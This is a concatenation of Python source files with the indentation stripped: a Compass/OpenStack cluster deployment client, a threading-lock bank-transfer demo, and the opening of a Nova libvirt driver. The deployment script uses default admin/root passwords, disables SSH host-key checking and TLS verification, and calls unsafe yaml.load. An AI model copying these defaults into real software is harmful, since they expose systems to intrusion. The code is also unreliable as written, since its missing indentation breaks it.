help='compass server url',
default='http://127.0.0.1/api'),
cfg.StrOpt('compass_user_email',
help='compass user email',
default='admin@huawei.com'),
cfg.StrOpt('compass_user_password',
help='compass user password',
default='admin'),
cfg.StrOpt('switch_ips',
help='comma seperated switch ips',
default=''),
cfg.StrOpt('switch_credential',
help='comma separated <credential key>=<credential value>',
default='version=2c,community=public'),
cfg.IntOpt('switch_max_retries',
help='max retries of poll switch',
default=10),
cfg.IntOpt('switch_retry_interval',
help='interval to repoll switch',
default=10),
cfg.BoolOpt('poll_switches',
help='if the client polls switches',
default=True),
cfg.StrOpt('machines',
help='comma separated mac addresses of machines',
default=''),
cfg.StrOpt('subnets',
help='comma seperated subnets',
default=''),
cfg.StrOpt('adapter_name',
help='adapter name',
default=''),
cfg.StrOpt('adapter_os_pattern',
help='adapter os name',
default=r'^(?i)centos.*'),
cfg.StrOpt('adapter_target_system_pattern',
help='adapter target system name',
default='^openstack$'),
cfg.StrOpt('adapter_flavor_pattern',
help='adapter flavor name',
default='allinone'),
cfg.StrOpt('cluster_name',
help='cluster name',
default='cluster1'),
cfg.StrOpt('language',
help='language',
default='EN'),
cfg.StrOpt('timezone',
help='timezone',
default='GMT'),
cfg.StrOpt('http_proxy',
help='http proxy',
default=''),
cfg.StrOpt('https_proxy',
help='https proxy',
default=''),
cfg.StrOpt('no_proxy',
help='no proxy',
default=''),
cfg.StrOpt('ntp_server',
help='ntp server',
default=''),
cfg.StrOpt('dns_servers',
help='dns servers',
default=''),
cfg.StrOpt('domain',
help='domain',
default=''),
cfg.StrOpt('search_path',
help='search path',
default=''),
cfg.StrOpt('local_repo_url',
help='local repo url',
default=''),
cfg.StrOpt('default_gateway',
help='default gateway',
default=''),
cfg.StrOpt('server_credential',
help=(
'server credential formatted as '
'<username>=<password>'
),
default='root=root'),
cfg.StrOpt('os_config_json_file',
help='json formatted os config file',
default=''),
cfg.StrOpt('service_credentials',
help=(
'comma seperated service credentials formatted as '
'<servicename>:<username>=<password>,...'
),
default=''),
cfg.StrOpt('console_credentials',
help=(
'comma seperated console credential formated as '
'<consolename>:<username>=<password>'
),
default=''),
cfg.StrOpt('hostnames',
help='comma seperated hostname',
default=''),
cfg.StrOpt('host_networks',
help=(
'semicomma seperated host name and its networks '
'<hostname>:<interface_name>=<ip>|<is_mgmt>|<is_promiscuous>,...'
),
default=''),
cfg.StrOpt('partitions',
help=(
'comma seperated partitions '
'<partition name>=<partition_value>'
),
default='tmp:percentage=10%,var:percentage=30%,home:percentage=30%'),
cfg.StrOpt('network_mapping',
help=(
'comma seperated network mapping '
'<network_type>=<interface_name>'
),
default=''),
cfg.StrOpt('package_config_json_file',
help='json formatted os config file',
default=''),
cfg.StrOpt('host_roles',
help=(
'semicomma separated host roles '
'<hostname>=<comma separated roles>'
),
default=''),
cfg.StrOpt('default_roles',
help=(
'comma seperated default roles '
'<rolename>'
),
default=''),
cfg.IntOpt('action_timeout',
help='action timeout in seconds',
default=60),
cfg.IntOpt('deployment_timeout',
help='deployment timeout in minutes',
default=60),
cfg.IntOpt('progress_update_check_interval',
help='progress update status check interval in seconds',
default=60),
cfg.StrOpt('dashboard_url',
help='dashboard url',
default=''),
cfg.StrOpt('dashboard_link_pattern',
help='dashboard link pattern',
default=r'(?m)(http://\d+\.\d+\.\d+\.\d+:5000/v2\.0)'),
cfg.StrOpt('cluster_vip',
help='cluster ip address',
default=''),
cfg.StrOpt('enable_secgroup',
help='enable security group',
default='true'),
cfg.StrOpt('enable_vpnaas',
help='enable vpn as service',
default='true'),
cfg.StrOpt('enable_fwaas',
help='enable firewall as service',
default='true'),
cfg.StrOpt('network_cfg',
help='netowrk config file',
default=''),
cfg.StrOpt('neutron_cfg',
help='netowrk config file',
default=''),
cfg.StrOpt('cluster_pub_vip',
help='cluster ip address',
default=''),
cfg.StrOpt('cluster_prv_vip',
help='cluster ip address',
default=''),
cfg.StrOpt('repo_name',
help='repo name',
default=''),
cfg.StrOpt('deploy_type',
help='deploy type',
default='virtual'),
cfg.StrOpt('deploy_flag',
help='deploy flag',
default='deploy'),
cfg.StrOpt('rsa_file',
help='ssh rsa key file',
default=''),
cfg.StrOpt('odl_l3_agent',
help='odl l3 agent enable flag',
default='Disable'),
]
CONF.register_cli_opts(opts)
def is_role_unassigned(role):
return role
def _load_config(config_filename):
if not config_filename:
return {}
with open(config_filename) as config_file:
content = config_file.read()
return json.loads(content)
class CompassClient(object):
def __init__(self):
LOG.info("xh: compass_server=%s" % CONF.compass_server)
self.client = Client(CONF.compass_server)
self.subnet_mapping = {}
self.role_mapping = {}
self.host_mapping = {}
self.host_ips = defaultdict(list)
self.host_roles = {}
self.login()
def is_ok(self, status):
if status < 300 and status >= 200:
return True
def login(self):
status, resp = self.client.get_token(
CONF.compass_user_email,
CONF.compass_user_password
)
LOG.info(
'login status: %s, resp: %s',
status, resp
)
if self.is_ok(status):
return resp["token"]
else:
raise Exception(
'failed to login %s with user %s',
CONF.compass_server,
CONF.compass_user_email
)
def get_machines(self):
status, resp = self.client.list_machines()
if not self.is_ok(status):
LOG.error(
'get all machines status: %s, resp: %s', status, resp)
raise RuntimeError('failed to get machines')
machines_to_add = list(set([
machine for machine in CONF.machines.split(',')
if machine
]))
machines_db = [str(m["mac"]) for m in resp]
LOG.info('machines in db: %s\n to add: %s', machines_db, machines_to_add)
if not set(machines_to_add).issubset(set(machines_db)):
raise RuntimeError('unidentify machine to add')
return [m["id"] for m in resp if str(m["mac"]) in machines_to_add]
def list_clusters(self):
status, resp = self.client.list_clusters(name=CONF.cluster_name)
if not self.is_ok(status) or not resp:
raise RuntimeError('failed to list cluster')
cluster = resp[0]
return cluster['id']
def get_adapter(self):
"""get adapter."""
status, resp = self.client.list_adapters(name=CONF.adapter_name)
LOG.info(
'get all adapters status: %s, resp: %s',
status, resp
)
if not self.is_ok(status) or not resp:
raise RuntimeError('failed to get adapters')
os_re = re.compile(CONF.adapter_os_pattern)
flavor_re = re.compile(CONF.adapter_flavor_pattern)
adapter_id = None
os_id = None
flavor_id = None
adapter = None
adapter = resp[0]
adapter_id = adapter['id']
for supported_os in adapter['supported_oses']:
if not os_re or os_re.match(supported_os['name']):
os_id = supported_os['os_id']
break
if 'flavors' in adapter:
for flavor in adapter['flavors']:
if not flavor_re or flavor_re.match(flavor['name']):
flavor_id = flavor['id']
break
assert(os_id and flavor_id)
return (adapter_id, os_id, flavor_id)
def add_subnets(self):
subnets = [
subnet for subnet in CONF.subnets.split(',')
if subnet
]
assert(subnets)
subnet_mapping = {}
for subnet in subnets:
try:
netaddr.IPNetwork(subnet)
except:
raise RuntimeError('subnet %s format is invalid' % subnet)
status, resp = self.client.add_subnet(subnet)
LOG.info('add subnet %s status %s response %s',
subnet, status, resp)
if not self.is_ok(status):
raise RuntimeError('failed to add subnet %s' % subnet)
subnet_mapping[resp['subnet']] = resp['id']
self.subnet_mapping = subnet_mapping
def add_cluster(self, adapter_id, os_id, flavor_id):
"""add a cluster."""
cluster_name = CONF.cluster_name
assert(cluster_name)
status, resp = self.client.add_cluster(
cluster_name, adapter_id,
os_id, flavor_id)
if not self.is_ok(status):
raise RuntimeError("add cluster failed")
LOG.info('add cluster %s status: %s resp:%s',
cluster_name, status,resp)
if isinstance(resp, list):
cluster = resp[0]
else:
cluster = resp
cluster_id = cluster['id']
flavor = cluster.get('flavor', {})
roles = flavor.get('roles', [])
for role in roles:
if role.get('optional', False):
self.role_mapping[role['name']] = ROLE_ASSIGNED
else:
self.role_mapping[role['name']] = ROLE_UNASSIGNED
return cluster_id
def add_cluster_hosts(self, cluster_id, machines):
hostnames = [
hostname for hostname in CONF.hostnames.split(',')
if hostname
]
assert(len(machines) == len(hostnames))
machines_dict = []
for machine_id, hostname in zip(machines, hostnames):
machines_dict.append({
'machine_id': machine_id,
'name': hostname
})
# add hosts to the cluster.
status, resp = self.client.add_hosts_to_cluster(
cluster_id,
{'machines': machines_dict})
LOG.info('add machines %s to cluster %s status: %s, resp: %s',
machines_dict, cluster_id, status, resp)
if not self.is_ok(status):
raise RuntimeError("add host to cluster failed")
for host in resp['hosts']:
self.host_mapping[host['hostname']] = host['id']
assert(len(self.host_mapping) == len(machines))
def set_cluster_os_config(self, cluster_id):
"""set cluster os config."""
os_config = {}
language = CONF.language
timezone = CONF.timezone
http_proxy = CONF.http_proxy
https_proxy = CONF.https_proxy
local_repo_url = CONF.local_repo_url
repo_name = CONF.repo_name
deploy_type = CONF.deploy_type
if not https_proxy and http_proxy:
https_proxy = http_proxy
no_proxy = [
no_proxy for no_proxy in CONF.no_proxy.split(',')
if no_proxy
]
compass_server = CONF.compass_server
if http_proxy:
for hostname, ips in self.host_ips.items():
no_proxy.append(hostname)
no_proxy.extend(ips)
ntp_server = CONF.ntp_server or compass_server
dns_servers = [
dns_server for dns_server in CONF.dns_servers.split(',')
if dns_server
]
if not dns_servers:
dns_servers = [compass_server]
domain = CONF.domain
if not domain:
raise Exception('domain is not defined')
search_path = [
search_path for search_path in CONF.search_path.split(',')
if search_path
]
if not search_path:
search_path = [domain]
default_gateway = CONF.default_gateway
if not default_gateway:
raise Exception('default gateway is not defined')
general_config = {
'language': language,
'timezone': timezone,
'ntp_server': ntp_server,
'dns_servers': dns_servers,
'default_gateway': default_gateway
}
if http_proxy:
general_config['http_proxy'] = http_proxy
if https_proxy:
general_config['https_proxy'] = https_proxy
if no_proxy:
general_config['no_proxy'] = no_proxy
if domain:
general_config['domain'] = domain
if search_path:
general_config['search_path'] = search_path
if local_repo_url:
general_config['local_repo'] = local_repo_url
if repo_name:
general_config['repo_name'] = repo_name
if deploy_type:
general_config['deploy_type'] = deploy_type
os_config["general"] = general_config
server_credential = CONF.server_credential
if '=' in server_credential:
server_username, server_password = server_credential.split('=', 1)
elif server_credential:
server_username = server_password = server_credential
else:
server_username = 'root'
server_password = 'root'
os_config['server_credentials'] = {
'username': server_username,
'password': server_password
}
partitions = [
partition for partition in CONF.partitions.split(',')
if partition
]
partition_config = {}
for partition in partitions:
assert("=" in partition)
partition_name, partition_value = partition.split('=', 1)
partition_name = partition_name.strip()
partition_value = partition_value.strip()
assert(partition_name and partition_value)
if partition_value.endswith('%'):
partition_type = 'percentage'
partition_value = int(partition_value[:-1])
else:
partition_type = 'size'
partition_config[partition_name] = {
partition_type: partition_value
}
os_config['partition'] = partition_config
"""
os_config_filename = CONF.os_config_json_file
if os_config_filename:
util.merge_dict(
os_config, _load_config(os_config_filename)
)
"""
status, resp = self.client.update_cluster_config(
cluster_id, os_config=os_config)
LOG.info(
'set os config %s to cluster %s status: %s, resp: %s',
os_config, cluster_id, status, resp)
if not self.is_ok(status):
raise RuntimeError('failed to set os config %s to cluster %s' \
% (os_config, cluster_id))
def set_host_networking(self):
"""set cluster hosts networking."""
def get_subnet(ip_str):
try:
LOG.info("subnets: %s" % self.subnet_mapping.keys())
ip = netaddr.IPAddress(ip_str)
for cidr, subnet_id in self.subnet_mapping.items():
subnet = netaddr.IPNetwork(cidr)
if ip in subnet:
return True, subnet_id
LOG.info("ip %s not in %s" % (ip_str, cidr))
return False, None
except:
LOG.exception("ip addr %s is invalid" % ip_str)
return False, None
for host_network in CONF.host_networks.split(';'):
hostname, networks_str = host_network.split(':', 1)
hostname = hostname.strip()
networks_str = networks_str.strip()
assert(hostname in self.host_mapping)
host_id = self.host_mapping[hostname]
intf_list = networks_str.split(',')
for intf_str in intf_list:
interface, intf_properties = intf_str.split('=', 1)
intf_properties = intf_properties.strip().split('|')
assert(intf_properties)
ip_str = intf_properties[0]
status, subnet_id = get_subnet(ip_str)
if not status:
raise RuntimeError("ip addr %s is invalid" % ip_str)
properties = dict([
(intf_property, True)
for intf_property in intf_properties[1:]
])
LOG.info(
'add host %s interface %s ip %s network proprties %s',
hostname, interface, ip_str, properties)
status, response = self.client.add_host_network(
host_id, interface, ip=ip_str, subnet_id=subnet_id,
**properties
)
LOG.info(
'add host %s interface %s ip %s network properties %s '
'status %s: %s',
hostname, interface, ip_str, properties,
status, response
)
if not self.is_ok(status):
raise RuntimeError("add host network failed")
self.host_ips[hostname].append(ip_str)
def set_cluster_package_config(self, cluster_id):
"""set cluster package config."""
package_config = {"security": {}}
service_credentials = [
service_credential
for service_credential in CONF.service_credentials.split(',')
if service_credential
]
service_credential_cfg = {}
LOG.info(
'service credentials: %s', service_credentials
)
for service_credential in service_credentials:
if ':' not in service_credential:
raise Exception(
'there is no : in service credential %s' % service_credential
)
service_name, service_pair = service_credential.split(':', 1)
if '=' not in service_pair:
raise Exception(
'there is no = in service %s security' % service_name
)
username, password = service_pair.split('=', 1)
service_credential_cfg[service_name] = {
'username': username,
'password': password
}
console_credentials = [
console_credential
for console_credential in CONF.console_credentials.split(',')
if console_credential
]
LOG.info(
'console credentials: %s', console_credentials
)
console_credential_cfg = {}
for console_credential in console_credentials:
if ':' not in console_credential:
raise Exception(
'there is no : in console credential %s' % console_credential
)
console_name, console_pair = console_credential.split(':', 1)
if '=' not in console_pair:
raise Exception(
'there is no = in console %s security' % console_name
)
username, password = console_pair.split('=', 1)
console_credential_cfg[console_name] = {
'username': username,
'password': password
}
package_config["security"] = {"service_credentials": service_credential_cfg,
"console_credentials": console_credential_cfg}
network_mapping = dict([
network_pair.split('=', 1)
for network_pair in CONF.network_mapping.split(',')
if '=' in network_pair
])
package_config['network_mapping'] = network_mapping
assert(os.path.exists(CONF.network_cfg))
network_cfg = yaml.load(open(CONF.network_cfg))
package_config["network_cfg"] = network_cfg
assert(os.path.exists(CONF.neutron_cfg))
neutron_cfg = yaml.load(open(CONF.neutron_cfg))
package_config["neutron_config"] = neutron_cfg
"""
package_config_filename = CONF.package_config_json_file
if package_config_filename:
util.merge_dict(
package_config, _load_config(package_config_filename)
)
"""
package_config['ha_proxy'] = {}
if CONF.cluster_vip:
package_config["ha_proxy"]["vip"] = CONF.cluster_vip
package_config['enable_secgroup'] = (CONF.enable_secgroup == "true")
package_config['enable_fwaas'] = (CONF.enable_fwaas== "true")
package_config['enable_vpnaas'] = (CONF.enable_vpnaas== "true")
package_config['odl_l3_agent'] = "Enable" if CONF.odl_l3_agent == "Enable" else "Disable"
status, resp = self.client.update_cluster_config(
cluster_id, package_config=package_config)
LOG.info(
'set package config %s to cluster %s status: %s, resp: %s',
package_config, cluster_id, status, resp)
if not self.is_ok(status):
raise RuntimeError("set cluster package_config failed")
def set_host_roles(self, cluster_id, host_id, roles):
status, response = self.client.update_cluster_host(
cluster_id, host_id, roles=roles)
LOG.info(
'set cluster %s host %s roles %s status %s: %s',
cluster_id, host_id, roles, status, response
)
if not self.is_ok(status):
raise RuntimeError("set host roles failed")
for role in roles:
if role in self.role_mapping:
self.role_mapping[role] = ROLE_ASSIGNED
def set_all_hosts_roles(self, cluster_id):
for host_str in CONF.host_roles.split(';'):
host_str = host_str.strip()
hostname, roles_str = host_str.split('=', 1)
assert(hostname in self.host_mapping)
host_id = self.host_mapping[hostname]
roles = [role.strip() for role in roles_str.split(',') if role]
self.set_host_roles(cluster_id, host_id, roles)
self.host_roles[hostname] = roles
unassigned_hostnames = list(set(self.host_mapping.keys()) \
- set(self.host_roles.keys()))
unassigned_roles = [ role for role, status in self.role_mapping.items()
if is_role_unassigned(status)]
assert(len(unassigned_hostnames) >= len(unassigned_roles))
for hostname, role in map(None, unassigned_hostnames, unassigned_roles):
host_id = self.host_mapping[hostname]
self.set_host_roles(cluster_id, host_id, [role])
self.host_roles[hostname] = [role]
unassigned_hostnames = list(set(self.host_mapping.keys()) \
- set(self.host_roles.keys()))
if not unassigned_hostnames:
return
# assign default roles to unassigned hosts
default_roles = [
role for role in CONF.default_roles.split(',')
if role
]
assert(default_roles)
cycle_roles = itertools.cycle(default_roles)
for hostname in unassigned_hostnames:
host_id = self.host_mapping[hostname]
roles = [cycle_roles.next()]
self.set_host_roles(cluster_id, host_id, roles)
self.host_roles[hostname] = roles
def deploy_clusters(self, cluster_id):
host_ids = self.host_mapping.values()
status, response = self.client.review_cluster(
cluster_id, review={'hosts': host_ids}
)
LOG.info(
'review cluster %s hosts %s, status %s: %s',
cluster_id, host_ids, status, response
)
#TODO, what this doning?
if not self.is_ok(status):
raise RuntimeError("review cluster host failed")
status, response = self.client.deploy_cluster(
cluster_id, deploy={'hosts': host_ids}
)
LOG.info(
'deploy cluster %s hosts %s status %s: %s',
cluster_id, host_ids, status, response
)
if not self.is_ok(status):
raise RuntimeError("deploy cluster failed")
def redeploy_clusters(self, cluster_id):
status, response = self.client.redeploy_cluster(
cluster_id
)
if not self.is_ok(status):
LOG.info(
'deploy cluster %s status %s: %s',
cluster_id, status, response
)
raise RuntimeError("redeploy cluster failed")
def get_cluster_state(self, cluster_id):
for _ in range(10):
try:
status, cluster_state = self.client.get_cluster_state(cluster_id)
if self.is_ok(status):
break
except:
status = 500
cluster_state = ""
LOG.error("can not get cluster %s's state, try again" % cluster_id)
time.sleep(6)
return status, cluster_state
def get_installing_progress(self, cluster_id):
def _get_installing_progress():
"""get intalling progress."""
deployment_timeout = time.time() + 60 * float(CONF.deployment_timeout)
current_time = time.time
while current_time() < deployment_timeout:
status, cluster_state = self.get_cluster_state(cluster_id)
if not self.is_ok(status):
raise RuntimeError("can not get cluster state")
elif cluster_state['state'] == 'SUCCESSFUL':
LOG.info(
'get cluster %s state status %s: %s, successful',
cluster_id, status, cluster_state
)
break
elif cluster_state['state'] == 'ERROR':
raise RuntimeError(
'get cluster %s state status %s: %s, error',
(cluster_id, status, cluster_state)
)
time.sleep(5)
if current_time() >= deployment_timeout:
LOG.info("current_time=%s, deployment_timeout=%s" \
% (current_time(), deployment_timeout))
raise RuntimeError("installation timeout")
try:
_get_installing_progress()
finally:
# do this twice, make sure process be killed
kill_print_proc()
kill_print_proc()
def check_dashboard_links(self, cluster_id):
dashboard_url = CONF.dashboard_url
if not dashboard_url:
LOG.info('no dashboarde url set')
return
dashboard_link_pattern = re.compile(
CONF.dashboard_link_pattern)
r = requests.get(dashboard_url, verify=False)
r.raise_for_status()
match = dashboard_link_pattern.search(r.text)
if match:
LOG.info(
'dashboard login page for cluster %s can be downloaded',
cluster_id)
else:
msg = (
'%s failed to be downloaded\n'
'the context is:\n%s\n'
) % (dashboard_url, r.text)
raise Exception(msg)
def print_ansible_log():
os.system("ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i %s root@192.168.200.2 \
'while ! tail -f /var/ansible/run/openstack_liberty-opnfv2/ansible.log 2>/dev/null; do :; sleep 1; done'" % CONF.rsa_file)
def kill_print_proc():
os.system("ps aux|grep -v grep|grep -E 'ssh.+root@192.168.200.2'|awk '{print $2}'|xargs kill -9")
def deploy():
client = CompassClient()
machines = client.get_machines()
LOG.info('machines are %s', machines)
client.add_subnets()
adapter_id, os_id, flavor_id = client.get_adapter()
cluster_id = client.add_cluster(adapter_id, os_id, flavor_id)
client.add_cluster_hosts(cluster_id, machines)
client.set_host_networking()
client.set_cluster_os_config(cluster_id)
if flavor_id:
client.set_cluster_package_config(cluster_id)
client.set_all_hosts_roles(cluster_id)
client.deploy_clusters(cluster_id)
LOG.info("compass OS installtion is begin")
threading.Thread(target=print_ansible_log).start()
client.get_installing_progress(cluster_id)
client.check_dashboard_links(cluster_id)
def redeploy():
client = CompassClient()
cluster_id = client.list_clusters()
client.redeploy_clusters(cluster_id)
client.get_installing_progress(cluster_id)
client.check_dashboard_links(cluster_id)
def main():
if CONF.deploy_flag == "redeploy":
redeploy()
else:
deploy()
if __name__ == "__main__":
CONF(args=sys.argv[1:])
main()
|
safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10_000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
transfer_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
# Not so good:
# transfer_lock.acquire()
#
# from_account.balance -= amount
# time.sleep(.000)
# to_account.balance += amount
#
# transfer_lock.release()
# good!
with transfer_lock:
from_account.balance -= amount
time.sleep(0.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with transfer_lock:
current = sum(a.balance for a in accounts)
if current != total:
print(
"ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
),
flush=True,
)
elif not quiet:
print(
"All good: Consistent account balance: ${:,}".format(total),
flush=True,
)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == "__main__":
main()
|
driver.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
**Related Flags**
:libvirt_type: Libvirt domain type. Can be kvm, qemu, uml, xen
(default: kvm).
:libvirt_uri: Override for the default libvirt URI (depends on libvirt_type).
:libvirt_disk_prefix: Override the default disk prefix for the devices
attached to a server.
:rescue_image_id: Rescue ami image (None = original image).
:rescue_kernel_id: Rescue aki image (None = original image).
:rescue_ramdisk_id: Rescue ari image (None = original image).
:injected_network_template: Template file for injected network
:allow_same_net_traffic: Whether to allow in project network traffic
"""
import errno
import eventlet
import functools
import glob
import os
import shutil
import socket
import sys
import tempfile
import threading
import time
import uuid
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova import notifier
from nova.objects import instance as instance_obj
from nova.objects import service as service_obj
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common import processutils
from nova.openstack.common import xmlutils
from nova.pci import pci_manager
from nova.pci import pci_utils
from nova.pci import pci_whitelist
from nova import unit
from nova import utils
from nova import version
from nova.virt import configdrive
from nova.virt.disk import api as disk
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt import netutils
from nova import volume
from nova.volume import encryptors
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
help='Rescue ami image'),
cfg.StrOpt('rescue_kernel_id',
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
help='Rescue ari image'),
cfg.StrOpt('libvirt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('libvirt_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on libvirt_type)'),
cfg.BoolOpt('libvirt_inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('libvirt_inject_key',
default=True,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('libvirt_inject_partition',
default=1,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.StrOpt('libvirt_vif_driver',
default='nova.virt.libvirt.vif.LibvirtGenericVIFDriver',
help='The libvirt VIF driver to configure the VIFs.'),
cfg.ListOpt('libvirt_volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'iser=nova.virt.libvirt.volume.LibvirtISERVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('libvirt_disk_prefix',
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on libvirt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('libvirt_wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.BoolOpt('libvirt_nonblocking',
default=True,
help='Use a separated OS thread pool to realize non-blocking'
' libvirt calls'),
cfg.StrOpt('libvirt_cpu_mode',
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If libvirt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('libvirt_cpu_model',
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'libvirt_cpu_mode="custom" and libvirt_type="kvm|qemu"'),
cfg.StrOpt('libvirt_snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('vcpu_pin_set',
help='Which pcpus can be used by vcpus of instance '
'e.g: "4-12,^8,15"'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
MAX_CONSOLE_BYTES = 100 * unit.Ki
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
